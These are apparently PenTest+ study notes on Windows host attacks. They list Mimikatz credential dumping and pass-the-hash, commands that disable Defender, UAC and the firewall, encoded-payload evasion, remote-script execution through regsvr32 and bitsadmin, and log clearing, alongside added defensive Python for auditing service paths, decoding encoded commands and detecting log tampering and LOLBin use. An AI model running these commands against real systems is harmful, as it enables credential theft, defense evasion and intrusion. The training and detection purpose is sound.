# Host Attacks (Objective 4.4)
Host-based attacks exploit system vulnerabilities and misconfigurations to gain unauthorized control, escalate privileges, or deploy malicious payloads on individual machines. Understanding these techniques is critical for comprehensive penetration testing (Domain 4: Attacks & Exploits).
---
### Privilege Escalation
- **Definition:** gaining higher-level permissions than initially granted.
  - **Vertical:** user → administrator
  - **Horizontal:** lateral access to peer accounts
- **Demo Tools:** Metasploit for hands-on escalation.
- **Key Tools & Commands:**
  - **Mimikatz:** extract creds & perform pass-the-hash
    - `sekurlsa::logonpasswords` → plaintext creds
    - `lsadump::sam` → SAM hashes
    - `sekurlsa::pth /user:Administrator /domain:example.com /ntlm:<hash> /run:cmd.exe` → pass-the-hash (spawns cmd.exe with the supplied NTLM hash)
  - **Seatbelt (C#):** automated security checks
    - `Seatbelt.exe all` → enumerate all checks
    - `Seatbelt.exe -group=checkselevated` → high-integrity processes
    - `Seatbelt.exe autoruns` → auto-run executables
  - **PowerShell ISE:** GUI for scripting enumeration (users, services, software).
---
### Credential Harvesting
- **Definition:** collecting usernames/passwords via social engineering or post-exploitation dumps.
- **Dumping Tools:**
  - **Mimikatz** (memory creds)
  - **Rubeus** (Kerberos tickets): TGT tickets for Kerberos
    - `rubeus.exe tgt::renew /user:admin /domain:banksecure.local`
---
### Misconfigured Endpoints
- **Endpoints:** computers, servers, mobiles.
- **Risk:** weak policies, unnecessary services, open ports.
- **Tools:**
  - **PowerShell** – scripting & enumeration
  - **PsExec** – remote command execution
    - Lateral movement by running commands as SYSTEM
---
### Unquoted Service Paths
- **Misconfiguration:** executable paths with spaces lack quotes (e.g. `C:\Program Files\MyService\service.exe`).
- **Risk:** Windows may execute `C:\Program.exe` if present.
- **Detection (PowerShell):**
```powershell
Get-WmiObject Win32_Service -Filter "StartMode='Auto'" | Where PathName -match '^[^"]+\s[^"]+' | ForEach-Object { "$($_.Name): $($_.PathName)" }
```
- **Exploitation:** place malicious `Program.exe` in C:\ → runs with service privileges.
- **Mitigation:** always enclose service paths in quotes.
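As an added audit example (not code from the original notes), the following Python reproduces how Windows resolves an unquoted service path: for each service it lists, in order, the executables that would be tried before the intended binary, and it produces the quoted path that fixes the finding. It goes a step beyond the one-liner above by handling arguments after the `.exe` and by discarding the one-liner's false positives (a space only after the `.exe`, such as `svchost.exe -k netsvcs`). The service names and paths are constructed.

```python
import re
from typing import Dict, List

# Same pattern as the PowerShell one-liner above: unquoted and containing a space.
UNQUOTED_RE = re.compile(r'^[^"]+\s[^"]+')

def hijack_candidates(path_name: str) -> List[str]:
    """Executables CreateProcess would try, in order, for an unquoted PathName.
    Each space-delimited prefix gets ".exe" appended until the prefix that
    already ends in .exe (the intended binary) is reached. Returns [] when
    there is nothing to hijack, including the one-liner's false positives
    such as "svchost.exe -k netsvcs" (space only after the .exe)."""
    if not UNQUOTED_RE.match(path_name):
        return []
    candidates, prefix = [], ""
    for token in path_name.split(" "):
        prefix = token if not prefix else f"{prefix} {token}"
        if prefix.lower().endswith(".exe"):
            candidates.append(prefix)      # the real binary: the search stops here
            break
        candidates.append(prefix + ".exe")
    return candidates if len(candidates) > 1 else []

def quoted_fix(path_name: str) -> str:
    """Mitigation: wrap the executable part in quotes and keep any arguments."""
    if not hijack_candidates(path_name):
        return path_name
    m = re.match(r'(.*?\.exe)(.*)$', path_name, flags=re.IGNORECASE)
    return f'"{m.group(1)}"{m.group(2)}' if m else path_name

# Constructed Win32_Service.PathName values (hypothetical services).
SAMPLE_SERVICES: Dict[str, str] = {
    "MyService": r"C:\Program Files\MyService\service.exe",
    "Updater":   r"C:\Program Files\Acme Tools\updater.exe -quiet",
    "GoodSvc":   r'"C:\Program Files\Good Vendor\good.exe" -svc',
    "Svchost":   r"C:\Windows\System32\svchost.exe -k netsvcs",
}

def audit(services: Dict[str, str]) -> Dict[str, List[str]]:
    """Vulnerable service name -> ordered hijack candidates."""
    result: Dict[str, List[str]] = {}
    for name, path in services.items():
        cands = hijack_candidates(path)
        if cands:
            result[name] = cands
    return result

if __name__ == "__main__":
    for name, cands in audit(SAMPLE_SERVICES).items():
        print(f"{name}: {cands}\n  fix: {quoted_fix(SAMPLE_SERVICES[name])}")
```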
---
### Disabling Security Software
- **PowerShell:**
- `Stop-Service -Name WinDefend -Force`
- `Set-Service -Name WinDefend -StartupType Disabled`
- Registry: `DisableRealtimeMonitoring = 1`
- **PsExec (remote):**
- `psexec \\target -u user -p pass -s powershell.exe -Command "Set-NetFirewallProfile -Enabled False"`
- Disable UAC via registry: `EnableLUA = 0`
---
### Payload Obfuscation
- **Goal:** hide malicious code from AV/IDS without altering function.
- **Methods:**
- **Encoding** (Base64)
- **Encryption**
- **Compression**
- **Code Manipulation** (junk code, renamed vars)
- **Example:**
```powershell
$b = [System.Text.Encoding]::Unicode.GetBytes($payload)
$e = [Convert]::ToBase64String($b)
powershell -EncodedCommand $e
```
- **Evil-WinRM:** tool for interacting with Windows Remote Management (WinRM) services
  - **Example:** `evil-winrm -i <remote> -u <user> -p <pass> -s "powershell -EncodedCommand $encodedPayload"`
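The defender-side inverse of the snippet above, as an added example that is not from the original notes: given a captured process command line it locates an encoded-command argument (including the abbreviations PowerShell accepts, such as `-e`, `-ec` and `-enc`), decodes Base64 and then UTF-16LE so the real script is visible, and ignores look-alike flags such as `-ExecutionPolicy`. The command lines are constructed.

```python
import base64
import re
from typing import Optional

# "-<flag> <value>" pairs; the value class is the Base64 alphabet plus padding.
ARG_RE = re.compile(r"-([A-Za-z]+)\s+([A-Za-z0-9+/=]+)")

def is_encoded_command_flag(flag: str) -> bool:
    """PowerShell accepts any prefix of 'EncodedCommand' from '-e' upwards and
    also '-ec', so test prefix-ness instead of one spelling. '-ExecutionPolicy'
    starts with 'e' but is not a prefix, so it is rejected."""
    flag = flag.lower()
    return flag == "ec" or (flag.startswith("e") and "encodedcommand".startswith(flag))

def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Decoded script if cmdline carries a valid encoded command, else None."""
    for flag, blob in ARG_RE.findall(cmdline):
        if not is_encoded_command_flag(flag):
            continue
        try:
            # Reverse of the snippet above: Base64 -> bytes -> UTF-16LE text.
            return base64.b64decode(blob, validate=True).decode("utf-16-le")
        except (ValueError, UnicodeDecodeError):
            continue    # not real Base64/UTF-16LE: treat as an ordinary argument
    return None

def encode_for_powershell(script: str) -> str:
    """Same transformation as the PowerShell snippet (UTF-16LE, then Base64)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")

# Constructed process command lines (not real telemetry).
PLAIN_SCRIPT = r"Get-Process | Out-File C:\Temp\procs.txt"
SAMPLE_ENCODED = "powershell.exe -NoP -W Hidden -enc " + encode_for_powershell(PLAIN_SCRIPT)
SAMPLE_BENIGN = r"powershell.exe -ExecutionPolicy Bypass -File C:\Scripts\backup.ps1"

if __name__ == "__main__":
    print(decode_encoded_command(SAMPLE_ENCODED))   # the original script
    print(decode_encoded_command(SAMPLE_BENIGN))    # None
```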
---
### User-Controlled Access Bypass
- **AD CS Exploit (Certify):** request certs for privileged accounts via misconfigured templates.
- **Kerberos Manipulation (Rubeus):**
- **Pass-the-Ticket** & **Golden Ticket** attacks.
- **Remote Exec (Evil-WinRM):** authenticate & run obfuscated payloads over WinRM.
  - WinRM can be reached over plain HTTP as well as HTTPS
---
### Shell & Kiosk Escapes
- **Shell Escape:** spawn full shell from restricted editors
- e.g. in vi: `:!bash`
- **PowerShell:** `Invoke-Expression -Command "cmd.exe"`
- **Kiosk Escape:** leverage browser “Save As” to access the filesystem, then fetch and run a script:
```powershell
Invoke-WebRequest -Uri "url" -OutFile ".ps1"
powershell.exe -ExecutionPolicy Bypass -File ".ps1"
```
- **WMI:** restart explorer to regain desktop:
```powershell
(Get-WmiObject Win32_Process -Filter "Name='explorer.exe'").Terminate()
Start-Process explorer.exe
```
---
### Library and Process Injection Methods
- **DLL Injection:** loading a DLL into the memory space of a target process
- **Process Hollowing:** a new process is launched in a suspended state, its memory is replaced with malicious code, then the process is resumed
- **Reflective DLL Injection:** a stealthier injection in which the DLL is loaded directly from memory rather than being written to disk first
- **Remote Thread Injection:** creating a new thread in a remote process and pointing it at memory containing malicious code
---
### Log Tampering
- **Definition:** modify/clear logs to hide attacker activity.
- **Tools:** PowerShell `Clear-EventLog` (Security, Application, System), PsExec for remote.
- **Detection:** log integrity monitoring, alerts on sudden clearance, secure backups.
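As an added example (not part of the original notes), this Python implements the "alerts on sudden clearance" detection: Windows writes an event for the clearing itself (Security log cleared → Event ID 1102, System or Application log cleared → Event ID 104, both from provider Microsoft-Windows-Eventlog), and a record ID that goes backwards shows the channel's log file was recreated. The event records are constructed.

```python
from dataclasses import dataclass
from typing import Dict, List

# Windows logs the clearing itself (provider Microsoft-Windows-Eventlog).
LOG_CLEARED_IDS = {
    1102: "Security log cleared",
    104: "System or Application log cleared",
}

@dataclass
class Event:
    record_id: int   # EventRecordID: increases within a channel until the log is recreated
    event_id: int
    channel: str
    user: str        # account recorded in the event (the clearer for 1102/104)

def detect_log_tampering(events: List[Event]) -> List[str]:
    """One alert per sign of tampering: an explicit clear event, or a record
    id that goes backwards, which means the channel's log file was replaced."""
    alerts: List[str] = []
    last_seen: Dict[str, int] = {}
    for ev in events:
        if ev.event_id in LOG_CLEARED_IDS:
            alerts.append(f"{ev.channel}: {LOG_CLEARED_IDS[ev.event_id]} "
                          f"(event {ev.event_id}) by {ev.user}")
        prev = last_seen.get(ev.channel)
        if prev is not None and ev.record_id < prev:
            alerts.append(f"{ev.channel}: record id went backwards "
                          f"({prev} -> {ev.record_id}); log file was recreated")
        last_seen[ev.channel] = ev.record_id
    return alerts

# Constructed events (not real telemetry): two logons, the Security log is
# cleared by jdoe, then a fresh log file starts numbering again from 1.
SAMPLE_EVENTS = [
    Event(4001, 4624, "Security", "alice"),
    Event(4002, 4672, "Security", "alice"),
    Event(4003, 1102, "Security", "jdoe"),
    Event(1, 4624, "Security", "svc_backup"),
    Event(9001, 7036, "System", "SYSTEM"),
]

if __name__ == "__main__":
    for alert in detect_log_tampering(SAMPLE_EVENTS):
        print("ALERT:", alert)
```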
---
### Living Off the Land (LOLBins)
Use trusted OS binaries to evade detection:
- **powershell.exe** → `Get-Process | Out-File C:\Temp\procs.txt`
- **bitsadmin.exe** → CLI for managing the Background Intelligent Transfer Service (BITS)
- `bitsadmin.exe /transfer "JobName" <url> <path>`
- **regsvr32.exe** → execute remote scripts
- `regsvr32.exe /s /n /u /i:<url> script.sct scrobj.dll`
- **schtasks.exe** → schedule SYSTEM-level tasks
  - `schtasks.exe /create /tn "ElevatedTask" /tr <path> /sc onlogon /ru "SYSTEM"`
- **certutil.exe** → certificate-management utility; abused to encode/decode and exfiltrate data.
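Detection rules for the LOLBin command shapes listed above, as an added example that is not from the original notes: each rule pairs a binary name with a pattern over the full command line, and the rules are run over constructed process-creation command lines of the kind found in Sysmon Event 1 or Security 4688 telemetry (198.51.100.7 is a documentation address, not a real host). The benign `certutil -store` and `schtasks /query` lines show that ordinary administrative use does not fire.

```python
import re
from typing import List, Tuple

# (binary name, regex over the full command line, what a match indicates)
LOLBIN_RULES: List[Tuple[str, str, str]] = [
    ("bitsadmin.exe", r"/transfer\b.*\bhttps?://",
     "BITS job used to download a remote file"),
    ("regsvr32.exe", r"/i:https?://.*\bscrobj\.dll",
     "scriptlet fetched from a URL and executed via scrobj.dll"),
    ("schtasks.exe", r'/create\b.*/ru\s+"?system"?',
     "scheduled task created to run as SYSTEM"),
    ("certutil.exe", r"-(?:urlcache|encode|decode)\b",
     "certutil used to download or encode/decode data"),
]

def image_name(cmdline: str) -> str:
    """Base name of the launched binary: the first token, quoted or not."""
    m = re.match(r'\s*(?:"([^"]+)"|(\S+))', cmdline)
    first = (m.group(1) or m.group(2)) if m else ""
    return first.rsplit("\\", 1)[-1].lower()

def classify(cmdline: str) -> List[str]:
    """Findings for one command line; empty when no rule fires."""
    exe = image_name(cmdline)
    return [why for binary, pattern, why in LOLBIN_RULES
            if exe == binary and re.search(pattern, cmdline, re.IGNORECASE)]

# Constructed process-creation command lines; the last two are benign uses.
SAMPLE_CMDLINES = [
    r'bitsadmin.exe /transfer "JobName" http://198.51.100.7/tool.exe C:\Users\Public\tool.exe',
    r'regsvr32.exe /s /n /u /i:http://198.51.100.7/script.sct scrobj.dll',
    r'schtasks.exe /create /tn "ElevatedTask" /tr C:\Users\Public\tool.exe /sc onlogon /ru "SYSTEM"',
    r'"C:\Windows\System32\certutil.exe" -urlcache -split -f http://198.51.100.7/p.txt C:\Users\Public\p.txt',
    r'C:\Windows\System32\certutil.exe -store My',
    r'schtasks.exe /query /tn "\Microsoft\Windows\Defrag\ScheduledDefrag"',
]

def scan(cmdlines: List[str]) -> List[Tuple[str, List[str]]]:
    """(command line, findings) for every line that triggered at least one rule."""
    return [(c, f) for c in cmdlines if (f := classify(c))]

if __name__ == "__main__":
    for cmdline, findings in scan(SAMPLE_CMDLINES):
        print(f"{findings}\n  {cmdline}")
```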